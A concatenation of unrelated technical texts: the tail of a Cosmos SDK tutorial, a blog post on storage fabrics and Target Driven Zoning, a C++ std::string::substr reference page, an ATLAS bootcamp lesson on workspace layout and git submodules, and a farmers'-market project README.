		AddRoute("issue", handleMsgIssue(keyIssue, keyAccount))
// Mount stores and load the latest state.
app.MountStoresIAVL(keyAccount, keyIssue)
err := app.LoadLatestVersion(keyAccount)
if err != nil {
cmn.Exit(err.Error())
}
return app
}
```
The main difference here, compared to `App1`, is that we use a second capability
key for a second store that is *only* passed to a second handler, the
`handleMsgIssue`. The first `handleMsgSend` has no access to this second store and cannot read or write to
it, ensuring a strong separation of concerns.
Note now that we're using Amino, we create a codec, register our types on the codec, and pass the
codec into our TxDecoder constructor, `tx2Decoder`. The SDK takes care of the rest for us!
## Conclusion
We've expanded on our first app by adding a new message type for issuing coins,
and by checking signatures. We learned how to use Amino for decoding into
interface types, allowing us to support multiple Msg types, and we learned how
to use the AnteHandler to validate transactions.
Unfortunately, our application is still insecure, because any valid transaction
can be replayed multiple times to drain someone's account! Besides, validating
signatures and preventing replays aren't things developers should have to think
about.
In the next section, we introduce the built-in SDK modules `auth` and `bank`,
which respectively provide secure implementations for all our transaction authentication
and coin transferring needs.
---
author: slowe
categories: Musing
comments: true
date: 2012-02-08T16:42:41Z
slug: thinking-out-loud-is-a-dvfabric-closer-than-we-think
tags:
- FCoE
- FibreChannel
- Storage
- Virtualization
- Networking
- ToL
title: 'Thinking Out Loud: Is A dvFabric Closer Than We Think?'
url: /2012/02/08/thinking-out-loud-is-a-dvfabric-closer-than-we-think/
wordpress_id: 2533
---
This is a short post, but one that I hope will stir some discussion.
Earlier this evening, I read Maish's blog post titled [My Wish for dvFabric---a dvSwitch for Storage](http://technodrone.blogspot.com/2012/02/my-wish-for-dvfabric-dvswitch-for.html). In that blog post Maish describes a self-configuring storage fabric that would simplify how we provision storage in a vSphere environment. Here's how Maish describes the dvFabric:
>So how do I envision this dvFabric? Essentially the same as a dvSwitch. A logical entity to which I attach my network cards (for iSCSI/NFS) or my HBAs (for FcoE or FC). I define which uplink goes to which storage, what the multi-pathing policy is for this uplink, how many ports should be used, what is the failover policy for which NIC, which NFS volumes to mount, which LUNS to add... I gather you see what I am getting at.
It's a pretty interesting idea, and one with a great deal of merit. So here's the "Thinking Out Loud" part: is Target Driven Zoning (or Peer Zoning) the answer to a large part of Maish's dvFabric?
If you don't know what Target Driven Zoning (TDZ) or Peer Zoning are, I recommend you go have a look at Erik Smith's [introductory blog post on Target Driven Zoning](http://brasstacksblog.typepad.com/brass-tacks/2012/01/introducing-target-driven-zoning-tdz.html). Based on Erik's description of TDZ, it certainly seems like it could be used to help on the block side of the house with Maish's dvFabric idea.
So what do you think---am I way off here?
----------------
title : C++ Reference - std::string's substr function
cat_title : substr
ref_title : substr, basic_string::substr
path : /C++ Reference/string
----------------
##@ cpp-ref-start
#@ substr
```cpp-formatted
basic_string substr(size_type pos = 0, size_type count = npos) const;
```
Returns a portion of the string.
Returns the substring that starts at character position `pos` and spans up to `count` characters. If the requested substring would extend past the end of the string, only the characters up to the end of the string are returned.
Also, if `npos` is passed as `count`, the substring from `pos` to the end of the original string is returned.
### Parameters
* `pos` : position of the first character (in the original string)
* `count` : length of the substring
### Return Value
The substring `[pos, pos + count)` of the original string.
### Exceptions
Throws a `std::out_of_range` exception if `pos` is greater than the length of the original string.
### Time Complexity
Linear in the length of the requested substring (`count`).
### Example
```cpp-formatted
#include <iostream>
#include <string>
int main() {
  std::string a = "0123456789abcdefghij";
  // count is npos, so the substring from pos to the end of the string is
  // returned.
  std::string sub1 = a.substr(10);
  std::cout << sub1 << '\n';
  // Both pos and pos + count are within the string, so the corresponding
  // substring is returned.
  std::string sub2 = a.substr(5, 3);
  std::cout << sub2 << '\n';
  // pos is within the string but pos + count is not, so the substring from
  // pos to the end of the string is returned.
  std::string sub4 = a.substr(a.size() - 3, 50);
  std::cout << sub4 << '\n';
  try {
    // pos is outside the string, so an exception is thrown.
    std::string sub5 = a.substr(a.size() + 3, 50);
    std::cout << sub5 << '\n';
  } catch (const std::out_of_range& e) {
    std::cout << "pos exceeds string size\n";
  }
}
```
Output
```exec
abcdefghij
567
hij
pos exceeds string size
```
### See Also
* `copy` : copies a range of characters.
* `size` : returns the length of the string.
* `find` : finds a substring within the string.
---
title: "Your Workspace"
teaching: 20
exercises: 20
questions:
- "How should I organize my code?"
objectives:
- "Learn about the standard structure for an ATLAS workspace."
keypoints:
- "Use three directories: `source/` for code, `build/` for binaries and `run/` for output."
---
# The Structure
When working on your analysis, you will most likely be editing, compiling and running code from several packages. There is a recommended way to organize your code. The structure is as follows:
- `source/`: Place all your packages here, one per directory.
- `source/CMakeLists.txt`: The top-level `CMakeLists.txt` file loading all of the ATLAS infrastructure and finding all of your packages.
- `build/`: Compiled binaries.
- `run/`: Place to run your analysis from (ie: where the results will be placed).
This is only a recommendation. You can take other approaches, if you like. For example, I like to append the release version to the `build` directory name. This allows me to easily revert to an older release, in case I want to understand a change.
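For reference, the top-level `source/CMakeLists.txt` mentioned above typically looks roughly like the sketch below; the release name (`AnalysisBase`) and the version numbers are placeholders for whatever you actually set up with `asetup`:
~~~cmake
# The minimum CMake version required by the ATLAS build infrastructure.
cmake_minimum_required( VERSION 3.2 FATAL_ERROR )

# Find the analysis release that was set up with asetup (placeholder version).
find_package( AnalysisBase 21.2 REQUIRED )

# Set up CTest, then declare the project; this picks up every package under source/.
atlas_ctest_setup()
atlas_project( WorkDir 21.2.75
   USE AnalysisBase 21.2.75 )

# Generate and install an environment setup script for the build area.
lcg_generate_env( SH_FILE ${CMAKE_BINARY_DIR}/${ATLAS_PLATFORM}/env_setup.sh )
install( FILES ${CMAKE_BINARY_DIR}/${ATLAS_PLATFORM}/env_setup.sh DESTINATION . )

# Set up CPack.
atlas_cpack_setup()
~~~
{: .source}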
> ## Multiple Build Directories
>
> What feature of CMake allows you to have multiple build directories?
>
> > ## Solution
> >
> > This is an advantage of the `out-of-source` builds used in CMake. You can separate your source code from the binaries, allowing you to keep several build configurations (for example, different releases or compilers) in parallel.
> {: .solution}
{: .challenge}
# Transitioning Your Current Project
At the end of the last day, you should be left with the following structure.
~~~shell
ls
~~~
{: .language-bash}
~~~
AnalysisPayload.cxx CMakeLists.txt JetSelectionHelper/ README.md
~~~
{: .output}
Our goal is to convert it into a structure similar to the one outlined above. We will do this using git commands, meaning that your whole change history will remain intact.
Start by creating the necessary directories.
~~~shell
mkdir source/
mkdir build/
mkdir run/
~~~
{: .language-bash}
Then you should move your `JetSelectionHelper` package into the `source/` directory. Unfortunately, the version of git inside the docker image is quite old (a common theme with ATLAS software, stability is key for our experiment!) and does not yet include the ability to move git submodules. There is a manual way to do this by editing several files inside `.git/`, but that is outside the scope of this tutorial. Instead we will remove the old `JetSelectionHelper` submodule and re-add it as `source/JetSelectionHelper`. Since the `JetSelectionHelper` lives inside its own repository, you will not lose any of the change history by doing so.
Start by removing the work tree of your submodule from your local git repository.
~~~shell
git submodule deinit JetSelectionHelper
~~~
{: .language-bash}
To remove the reference to the submodule, you need to manually edit the `.gitmodules` file and delete the following section.
~~~
[submodule "JetSelectionHelper"]
path = JetSelectionHelper
url = https://gitlab.cern.ch/usatlas-computing-bootcamp-2021/JetSelectionHelper.git
~~~
{: .source}
Finally remove the directory itself from git's index.
~~~shell
git rm JetSelectionHelper
~~~
{: .language-bash}
After these three steps, your git repository will no longer know about the `JetSelectionHelper` submodule.
Next, make a fork of the [JetSelectionHelper repository](https://gitlab.cern.ch/usatlas-computing-bootcamp-2021/JetSelectionHelper). You will be making a few modifications. Add it as a submodule under the `source/` directory. Don't forget to replace `${USER}` with your GitLab username!
~~~shell
git submodule add ssh://git@gitlab.cern.ch:7999/${USER}/JetSelectionHelper.git source/JetSelectionHelper
~~~
{: .language-bash}
The last step is to move the `AnalysisPayload` codebase into a new package with the same name. This can be done simply by using the `git mv` command that you might have learned about yesterday. The following block of commands will move everything into the structure described earlier.
~~~shell
mkdir source/AnalysisPayload
mkdir source/AnalysisPayload/util
git mv AnalysisPayload.cxx source/AnalysisPayload/util/
git rm CMakeLists.txt
rm source/JetSelectionHelper/CMakeLists.txt
~~~
{: .language-bash}
The list of changes to your repository should look like the following. Make sure to commit everything before moving to the next step! Don't worry about the modified content (missing `CMakeLists.txt`) inside the `JetSelectionHelper` for now.
```bash
# On branch master
# Changes to be committed:
# (use "git reset HEAD <file>..." to unstage)
#
# modified: .gitmodules
# deleted: CMakeLists.txt
# renamed: AnalysisPayload.cxx -> source/AnalysisPayload/util/AnalysisPayload.cxx
# renamed: JetSelectionHelper -> source/JetSelectionHelper
#
# Changes not staged for commit:
# (use "git add <file>..." to update what will be committed)
# (use "git checkout -- <file>..." to discard changes in working directory)
# (commit or discard the untracked or modified content in submodules)
#
# modified: source/JetSelectionHelper (modified content)
#
```
> ## Tracking the build/ Directory
>
> Notice that we did not at any point add the `build/` directory to the repository index. You should never version the contents of this directory. Why?
>
> > ## Solution
> >
> > There are two important reasons:
> > - Git reduces the history size by storing only the differences between file versions. For binary files, which is what `build/` mostly contains, finding the differences is more complicated. Thus, by default, Git will store the entire binary file anytime you make a change. This will blow up the size of your repository by a lot.
> > - Some of the files contain information custom to the user's environment (ie: compiler, location of libraries). By versioning these files, you will clutter the history by tracking changes that are not relevant to the execution of the code.
> >
> > If you ever commit the `build/` directory, bad things will happen to you!
> {: .solution}
{: .challenge}
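A cheap safeguard against an accidental `git add .` picking up the build area is to ignore it outright, with a top-level `.gitignore` containing:
~~~
build/
~~~
{: .source}
Git will then refuse to track anything under `build/` unless you explicitly force it.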
{% include links.md %}
Grown By Us [![Stories in Ready](https://badge.waffle.io/MindKitchen/grownbyus.png?label=ready&title=Ready)](https://waffle.io/MindKitchen/grownbyus) [![Join the chat at https://gitter.im/MindKitchen/grownbyus](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/MindKitchen/grownbyus?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
===========
A virtual farmers' market designed to encourage neighbors to grow, sell and trade food in their own back yards.